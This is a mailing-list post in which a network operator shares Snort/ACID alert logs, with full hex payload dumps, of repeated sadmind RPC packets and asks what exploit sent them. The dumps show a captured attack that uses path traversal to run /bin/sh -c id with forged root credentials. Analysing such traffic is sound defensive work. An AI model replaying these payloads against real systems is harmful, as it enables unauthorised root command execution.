Snort mailing list archives
Suspicious Traffic
From: "ISP Toolz" <kevin () isptoolz com>
Date: Thu, 24 Jun 2004 20:25:52 -0400
Have any of you seen any traffic similar to this or do you know what exploit or script that was used to try and overflow this system. Thanks. Generated by ACID v0.9.6b23 on Thu, 24 Jun 2004 02:46:20 -0400 ------------------------------------------------------------------------------ #(1 - 33320) [2004-06-21 12:33:33] [snort/2256] RPC sadmind query with root credentials attempt UDP IPv4: 207.36.196.39 -> 68.82.247.65 hlen=5 TOS=0 dlen=1476 ID=14454 flags=0 offset=0 TTL=49 chksum=15571 UDP: port=60730 -> dport: 32770 len=1456 Payload: length = 1448 000 : F9 7B 0C 15 00 00 00 00 00 00 00 02 00 01 87 88 .{.............. 010 : 00 00 00 0A 00 00 00 01 00 00 00 01 00 00 00 1C ................ 020 : 40 D7 86 85 00 00 00 07 65 78 70 6C 6F 69 74 00 @.......exploit. 030 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 040 : 00 00 00 00 40 D7 86 89 00 07 45 DF 00 00 00 00 ....@.....E..... 050 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 060 : 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 ................ 070 : 00 00 00 04 00 00 00 00 00 00 00 04 7F 00 00 01 ............... 080 : 00 01 87 88 00 00 00 0A 00 00 00 04 7F 00 00 01 ............... 090 : 00 01 87 88 00 00 00 0A 00 00 00 11 00 00 00 1E ................ 0a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0b0 : 00 00 00 3B 65 78 70 6C 6F 69 74 00 00 00 00 00 ...;exploit..... 0c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0f0 : 00 00 00 06 73 79 73 74 65 6D 00 00 00 00 00 15 ....system...... 100 : 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 62 ../../../../../b 110 : 69 6E 2F 73 68 00 00 00 00 00 04 1A 00 00 00 0E in/sh........... 120 : 41 44 4D 5F 46 57 5F 56 45 52 53 49 4F 4E 00 00 ADM_FW_VERSION.. 130 : 00 00 00 03 00 00 00 04 00 00 00 01 00 00 00 00 ................ 140 : 00 00 00 00 00 00 00 08 41 44 4D 5F 4C 41 4E 47 ........ADM_LANG 150 : 00 00 00 09 00 00 00 02 00 00 00 01 43 00 00 00 ............C... 160 : 00 00 00 00 00 00 00 00 00 00 00 0D 41 44 4D 5F ............ADM_ 170 : 52 45 51 55 45 53 54 49 44 00 00 00 00 00 00 09 REQUESTID....... 180 : 00 00 00 12 00 00 00 11 30 38 31 30 3A 31 30 31 ........0810:101 190 : 30 31 30 31 30 31 30 3A 31 00 00 00 00 00 00 00 0101010:1....... 1a0 : 00 00 00 00 00 00 00 09 41 44 4D 5F 43 4C 41 53 ........ADM_CLAS 1b0 : 53 00 00 00 00 00 00 09 00 00 00 07 00 00 00 06 S............... 1c0 : 73 79 73 74 65 6D 00 00 00 00 00 00 00 00 00 00 system.......... 1d0 : 00 00 00 0E 41 44 4D 5F 43 4C 41 53 53 5F 56 45 ....ADM_CLASS_VE 1e0 : 52 53 00 00 00 00 00 09 00 00 00 04 00 00 00 03 RS.............. 1f0 : 32 2E 31 00 00 00 00 00 00 00 00 00 00 00 00 0A 2.1............. 200 : 41 44 4D 5F 4D 45 54 48 4F 44 00 00 00 00 00 09 ADM_METHOD...... 210 : 00 00 00 16 00 00 00 15 2E 2E 2F 2E 2E 2F 2E 2E ........../../.. 220 : 2F 2E 2E 2F 2E 2E 2F 62 69 6E 2F 73 68 00 00 00 /../../bin/sh... 230 : 00 00 00 00 00 00 00 00 00 00 00 08 41 44 4D 5F ............ADM_ 240 : 48 4F 53 54 00 00 00 09 00 00 00 3C 00 00 00 3B HOST.......<...; 250 : 65 78 70 6C 6F 69 74 00 00 00 00 00 00 00 00 00 exploit......... 260 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 270 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 280 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 290 : 00 00 00 00 00 00 00 0F 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE 2a0 : 4E 54 5F 48 4F 53 54 00 00 00 00 09 00 00 00 08 NT_HOST......... 2b0 : 00 00 00 07 65 78 70 6C 6F 69 74 00 00 00 00 00 ....exploit..... 2c0 : 00 00 00 00 00 00 00 11 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE 2d0 : 4E 54 5F 44 4F 4D 41 49 4E 00 00 00 00 00 00 09 NT_DOMAIN....... 2e0 : 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 ................ 2f0 : 00 00 00 11 41 44 4D 5F 54 49 4D 45 4F 55 54 5F ....ADM_TIMEOUT_ 300 : 50 41 52 4D 53 00 00 00 00 00 00 09 00 00 00 1C PARMS........... 310 : 00 00 00 1B 54 54 4C 3D 30 20 50 54 4F 3D 32 30 ....TTL=0 PTO=20 320 : 20 50 43 4E 54 3D 32 20 50 44 4C 59 3D 33 30 00 PCNT=2 PDLY=30. 330 : 00 00 00 00 00 00 00 00 00 00 00 09 41 44 4D 5F ............ADM_ 340 : 46 45 4E 43 45 00 00 00 00 00 00 09 00 00 00 00 FENCE........... 350 : 00 00 00 00 00 00 00 00 00 00 00 01 58 00 00 00 ............X... 360 : 00 00 00 09 00 00 00 03 00 00 00 02 2D 63 00 00 ............-c.. 370 : 00 00 00 00 00 00 00 00 00 00 00 01 59 00 00 00 ............Y... 380 : 00 00 00 09 00 00 02 01 00 00 02 00 69 64 00 00 ............id.. 390 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 400 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 410 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 420 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 430 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 440 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 450 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 460 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 470 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 480 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 490 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 500 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 510 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 520 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 530 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 540 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 550 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 560 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 570 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 580 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 590 : 00 00 00 00 00 00 00 10 6E 65 74 6D 67 74 5F 65 ........netmgt_e 5a0 : 6E 64 6F 66 61 72 67 73 ndofargs ------------------------------------------------------------------------------ #(1 - 33321) [2004-06-21 12:33:37] [snort/2256] RPC sadmind query with root credentials attempt UDP IPv4: 207.36.196.39 -> 68.82.247.65 hlen=5 TOS=0 dlen=1476 ID=14863 flags=0 offset=0 TTL=49 chksum=15162 UDP: port=60732 -> dport: 32771 len=1456 Payload: length = 1448 000 : 6E 3E AA B1 00 00 00 00 00 00 00 02 00 01 87 88 n>.............. 010 : 00 00 00 0A 00 00 00 01 00 00 00 01 00 00 00 1C ................ 020 : 40 D7 86 89 00 00 00 07 65 78 70 6C 6F 69 74 00 @.......exploit. 030 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 040 : 00 00 00 00 40 D7 86 8D 00 07 45 DF 00 00 00 00 ....@.....E..... 050 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 060 : 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 ................ 070 : 00 00 00 04 00 00 00 00 00 00 00 04 7F 00 00 01 ............... 080 : 00 01 87 88 00 00 00 0A 00 00 00 04 7F 00 00 01 ............... 090 : 00 01 87 88 00 00 00 0A 00 00 00 11 00 00 00 1E ................ 0a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0b0 : 00 00 00 3B 65 78 70 6C 6F 69 74 00 00 00 00 00 ...;exploit..... 0c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0f0 : 00 00 00 06 73 79 73 74 65 6D 00 00 00 00 00 15 ....system...... 100 : 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 62 ../../../../../b 110 : 69 6E 2F 73 68 00 00 00 00 00 04 1A 00 00 00 0E in/sh........... 120 : 41 44 4D 5F 46 57 5F 56 45 52 53 49 4F 4E 00 00 ADM_FW_VERSION.. 130 : 00 00 00 03 00 00 00 04 00 00 00 01 00 00 00 00 ................ 140 : 00 00 00 00 00 00 00 08 41 44 4D 5F 4C 41 4E 47 ........ADM_LANG 150 : 00 00 00 09 00 00 00 02 00 00 00 01 43 00 00 00 ............C... 160 : 00 00 00 00 00 00 00 00 00 00 00 0D 41 44 4D 5F ............ADM_ 170 : 52 45 51 55 45 53 54 49 44 00 00 00 00 00 00 09 REQUESTID....... 180 : 00 00 00 12 00 00 00 11 30 38 31 30 3A 31 30 31 ........0810:101 190 : 30 31 30 31 30 31 30 3A 31 00 00 00 00 00 00 00 0101010:1....... 1a0 : 00 00 00 00 00 00 00 09 41 44 4D 5F 43 4C 41 53 ........ADM_CLAS 1b0 : 53 00 00 00 00 00 00 09 00 00 00 07 00 00 00 06 S............... 1c0 : 73 79 73 74 65 6D 00 00 00 00 00 00 00 00 00 00 system.......... 1d0 : 00 00 00 0E 41 44 4D 5F 43 4C 41 53 53 5F 56 45 ....ADM_CLASS_VE 1e0 : 52 53 00 00 00 00 00 09 00 00 00 04 00 00 00 03 RS.............. 1f0 : 32 2E 31 00 00 00 00 00 00 00 00 00 00 00 00 0A 2.1............. 200 : 41 44 4D 5F 4D 45 54 48 4F 44 00 00 00 00 00 09 ADM_METHOD...... 210 : 00 00 00 16 00 00 00 15 2E 2E 2F 2E 2E 2F 2E 2E ........../../.. 220 : 2F 2E 2E 2F 2E 2E 2F 62 69 6E 2F 73 68 00 00 00 /../../bin/sh... 230 : 00 00 00 00 00 00 00 00 00 00 00 08 41 44 4D 5F ............ADM_ 240 : 48 4F 53 54 00 00 00 09 00 00 00 3C 00 00 00 3B HOST.......<...; 250 : 65 78 70 6C 6F 69 74 00 00 00 00 00 00 00 00 00 exploit......... 260 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 270 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 280 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 290 : 00 00 00 00 00 00 00 0F 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE 2a0 : 4E 54 5F 48 4F 53 54 00 00 00 00 09 00 00 00 08 NT_HOST......... 2b0 : 00 00 00 07 65 78 70 6C 6F 69 74 00 00 00 00 00 ....exploit..... 2c0 : 00 00 00 00 00 00 00 11 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE 2d0 : 4E 54 5F 44 4F 4D 41 49 4E 00 00 00 00 00 00 09 NT_DOMAIN....... 2e0 : 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 ................ 2f0 : 00 00 00 11 41 44 4D 5F 54 49 4D 45 4F 55 54 5F ....ADM_TIMEOUT_ 300 : 50 41 52 4D 53 00 00 00 00 00 00 09 00 00 00 1C PARMS........... 310 : 00 00 00 1B 54 54 4C 3D 30 20 50 54 4F 3D 32 30 ....TTL=0 PTO=20 320 : 20 50 43 4E 54 3D 32 20 50 44 4C 59 3D 33 30 00 PCNT=2 PDLY=30. 330 : 00 00 00 00 00 00 00 00 00 00 00 09 41 44 4D 5F ............ADM_ 340 : 46 45 4E 43 45 00 00 00 00 00 00 09 00 00 00 00 FENCE........... 350 : 00 00 00 00 00 00 00 00 00 00 00 01 58 00 00 00 ............X... 360 : 00 00 00 09 00 00 00 03 00 00 00 02 2D 63 00 00 ............-c.. 370 : 00 00 00 00 00 00 00 00 00 00 00 01 59 00 00 00 ............Y... 380 : 00 00 00 09 00 00 02 01 00 00 02 00 69 64 00 00 ............id.. 390 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 400 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 410 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 420 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 430 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 440 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 450 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 460 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 470 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 480 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 490 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 500 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 510 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 520 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 530 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 540 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 550 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 560 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 570 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 580 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 590 : 00 00 00 00 00 00 00 10 6E 65 74 6D 67 74 5F 65 ........netmgt_e 5a0 : 6E 64 6F 66 61 72 67 73 ndofargs ------------------------------------------------------------------------------ #(1 - 33322) [2004-06-21 12:33:42] [snort/2256] RPC sadmind query with root credentials attempt UDP IPv4: 207.36.196.39 -> 68.82.247.65 hlen=5 TOS=0 dlen=1476 ID=15355 flags=0 offset=0 TTL=49 chksum=14670 UDP: port=60734 -> dport: 32772 len=1456 Payload: length = 1448 000 : 9C 3F DC 06 00 00 00 00 00 00 00 02 00 01 87 88 .?.............. 010 : 00 00 00 0A 00 00 00 01 00 00 00 01 00 00 00 1C ................ 020 : 40 D7 86 8E 00 00 00 07 65 78 70 6C 6F 69 74 00 @.......exploit. 030 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 040 : 00 00 00 00 40 D7 86 92 00 07 45 DF 00 00 00 00 ....@.....E..... 050 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 060 : 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 ................ 070 : 00 00 00 04 00 00 00 00 00 00 00 04 7F 00 00 01 ............... 080 : 00 01 87 88 00 00 00 0A 00 00 00 04 7F 00 00 01 ............... 090 : 00 01 87 88 00 00 00 0A 00 00 00 11 00 00 00 1E ................ 0a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0b0 : 00 00 00 3B 65 78 70 6C 6F 69 74 00 00 00 00 00 ...;exploit..... 0c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0f0 : 00 00 00 06 73 79 73 74 65 6D 00 00 00 00 00 15 ....system...... 100 : 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 62 ../../../../../b 110 : 69 6E 2F 73 68 00 00 00 00 00 04 1A 00 00 00 0E in/sh........... 120 : 41 44 4D 5F 46 57 5F 56 45 52 53 49 4F 4E 00 00 ADM_FW_VERSION.. 130 : 00 00 00 03 00 00 00 04 00 00 00 01 00 00 00 00 ................ 140 : 00 00 00 00 00 00 00 08 41 44 4D 5F 4C 41 4E 47 ........ADM_LANG 150 : 00 00 00 09 00 00 00 02 00 00 00 01 43 00 00 00 ............C... 160 : 00 00 00 00 00 00 00 00 00 00 00 0D 41 44 4D 5F ............ADM_ 170 : 52 45 51 55 45 53 54 49 44 00 00 00 00 00 00 09 REQUESTID....... 180 : 00 00 00 12 00 00 00 11 30 38 31 30 3A 31 30 31 ........0810:101 190 : 30 31 30 31 30 31 30 3A 31 00 00 00 00 00 00 00 0101010:1....... 1a0 : 00 00 00 00 00 00 00 09 41 44 4D 5F 43 4C 41 53 ........ADM_CLAS 1b0 : 53 00 00 00 00 00 00 09 00 00 00 07 00 00 00 06 S............... 1c0 : 73 79 73 74 65 6D 00 00 00 00 00 00 00 00 00 00 system.......... 1d0 : 00 00 00 0E 41 44 4D 5F 43 4C 41 53 53 5F 56 45 ....ADM_CLASS_VE 1e0 : 52 53 00 00 00 00 00 09 00 00 00 04 00 00 00 03 RS.............. 1f0 : 32 2E 31 00 00 00 00 00 00 00 00 00 00 00 00 0A 2.1............. 200 : 41 44 4D 5F 4D 45 54 48 4F 44 00 00 00 00 00 09 ADM_METHOD...... 210 : 00 00 00 16 00 00 00 15 2E 2E 2F 2E 2E 2F 2E 2E ........../../.. 220 : 2F 2E 2E 2F 2E 2E 2F 62 69 6E 2F 73 68 00 00 00 /../../bin/sh... 230 : 00 00 00 00 00 00 00 00 00 00 00 08 41 44 4D 5F ............ADM_ 240 : 48 4F 53 54 00 00 00 09 00 00 00 3C 00 00 00 3B HOST.......<...; 250 : 65 78 70 6C 6F 69 74 00 00 00 00 00 00 00 00 00 exploit......... 260 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 270 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 280 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 290 : 00 00 00 00 00 00 00 0F 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE 2a0 : 4E 54 5F 48 4F 53 54 00 00 00 00 09 00 00 00 08 NT_HOST......... 2b0 : 00 00 00 07 65 78 70 6C 6F 69 74 00 00 00 00 00 ....exploit..... 2c0 : 00 00 00 00 00 00 00 11 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE 2d0 : 4E 54 5F 44 4F 4D 41 49 4E 00 00 00 00 00 00 09 NT_DOMAIN....... 2e0 : 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 ................ 2f0 : 00 00 00 11 41 44 4D 5F 54 49 4D 45 4F 55 54 5F ....ADM_TIMEOUT_ 300 : 50 41 52 4D 53 00 00 00 00 00 00 09 00 00 00 1C PARMS........... 310 : 00 00 00 1B 54 54 4C 3D 30 20 50 54 4F 3D 32 30 ....TTL=0 PTO=20 320 : 20 50 43 4E 54 3D 32 20 50 44 4C 59 3D 33 30 00 PCNT=2 PDLY=30. 330 : 00 00 00 00 00 00 00 00 00 00 00 09 41 44 4D 5F ............ADM_ 340 : 46 45 4E 43 45 00 00 00 00 00 00 09 00 00 00 00 FENCE........... 350 : 00 00 00 00 00 00 00 00 00 00 00 01 58 00 00 00 ............X... 360 : 00 00 00 09 00 00 00 03 00 00 00 02 2D 63 00 00 ............-c.. 370 : 00 00 00 00 00 00 00 00 00 00 00 01 59 00 00 00 ............Y... 380 : 00 00 00 09 00 00 02 01 00 00 02 00 69 64 00 00 ............id.. 390 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 400 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 410 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 420 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 430 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 440 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 450 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 460 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 470 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 480 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 490 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 500 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 510 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 520 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 530 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 540 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 550 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 560 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 570 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 580 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 590 : 00 00 00 00 00 00 00 10 6E 65 74 6D 67 74 5F 65 ........netmgt_e 5a0 : 6E 64 6F 66 61 72 67 73 ndofargs ------------------------------------------------------------------------------ #(1 - 33323) [2004-06-21 12:33:46] [snort/2256] RPC sadmind query with root credentials attempt UDP IPv4: 207.36.196.39 -> 68.82.247.65 hlen=5 TOS=0 dlen=1476 ID=15774 flags=0 offset=0 TTL=49 chksum=14251 UDP: port=60736 -> dport: 32773 len=1456 Payload: length = 1448 000 : D4 F6 08 48 00 00 00 00 00 00 00 02 00 01 87 88 ...H............ 010 : 00 00 00 0A 00 00 00 01 00 00 00 01 00 00 00 1C ................ 020 : 40 D7 86 93 00 00 00 07 65 78 70 6C 6F 69 74 00 @.......exploit. 030 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 040 : 00 00 00 00 40 D7 86 97 00 07 45 DF 00 00 00 00 ....@.....E..... 050 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 060 : 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 ................ 070 : 00 00 00 04 00 00 00 00 00 00 00 04 7F 00 00 01 ............... 080 : 00 01 87 88 00 00 00 0A 00 00 00 04 7F 00 00 01 ............... 090 : 00 01 87 88 00 00 00 0A 00 00 00 11 00 00 00 1E ................ 0a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0b0 : 00 00 00 3B 65 78 70 6C 6F 69 74 00 00 00 00 00 ...;exploit..... 0c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0f0 : 00 00 00 06 73 79 73 74 65 6D 00 00 00 00 00 15 ....system...... 100 : 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 62 ../../../../../b 110 : 69 6E 2F 73 68 00 00 00 00 00 04 1A 00 00 00 0E in/sh........... 120 : 41 44 4D 5F 46 57 5F 56 45 52 53 49 4F 4E 00 00 ADM_FW_VERSION.. 130 : 00 00 00 03 00 00 00 04 00 00 00 01 00 00 00 00 ................ 140 : 00 00 00 00 00 00 00 08 41 44 4D 5F 4C 41 4E 47 ........ADM_LANG 150 : 00 00 00 09 00 00 00 02 00 00 00 01 43 00 00 00 ............C... 160 : 00 00 00 00 00 00 00 00 00 00 00 0D 41 44 4D 5F ............ADM_ 170 : 52 45 51 55 45 53 54 49 44 00 00 00 00 00 00 09 REQUESTID....... 180 : 00 00 00 12 00 00 00 11 30 38 31 30 3A 31 30 31 ........0810:101 190 : 30 31 30 31 30 31 30 3A 31 00 00 00 00 00 00 00 0101010:1....... 1a0 : 00 00 00 00 00 00 00 09 41 44 4D 5F 43 4C 41 53 ........ADM_CLAS 1b0 : 53 00 00 00 00 00 00 09 00 00 00 07 00 00 00 06 S............... 1c0 : 73 79 73 74 65 6D 00 00 00 00 00 00 00 00 00 00 system.......... 1d0 : 00 00 00 0E 41 44 4D 5F 43 4C 41 53 53 5F 56 45 ....ADM_CLASS_VE 1e0 : 52 53 00 00 00 00 00 09 00 00 00 04 00 00 00 03 RS.............. 1f0 : 32 2E 31 00 00 00 00 00 00 00 00 00 00 00 00 0A 2.1............. 200 : 41 44 4D 5F 4D 45 54 48 4F 44 00 00 00 00 00 09 ADM_METHOD...... 210 : 00 00 00 16 00 00 00 15 2E 2E 2F 2E 2E 2F 2E 2E ........../../.. 220 : 2F 2E 2E 2F 2E 2E 2F 62 69 6E 2F 73 68 00 00 00 /../../bin/sh... 230 : 00 00 00 00 00 00 00 00 00 00 00 08 41 44 4D 5F ............ADM_ 240 : 48 4F 53 54 00 00 00 09 00 00 00 3C 00 00 00 3B HOST.......<...; 250 : 65 78 70 6C 6F 69 74 00 00 00 00 00 00 00 00 00 exploit......... 260 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 270 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 280 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 290 : 00 00 00 00 00 00 00 0F 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE 2a0 : 4E 54 5F 48 4F 53 54 00 00 00 00 09 00 00 00 08 NT_HOST......... 2b0 : 00 00 00 07 65 78 70 6C 6F 69 74 00 00 00 00 00 ....exploit..... 2c0 : 00 00 00 00 00 00 00 11 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE 2d0 : 4E 54 5F 44 4F 4D 41 49 4E 00 00 00 00 00 00 09 NT_DOMAIN....... 2e0 : 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 ................ 2f0 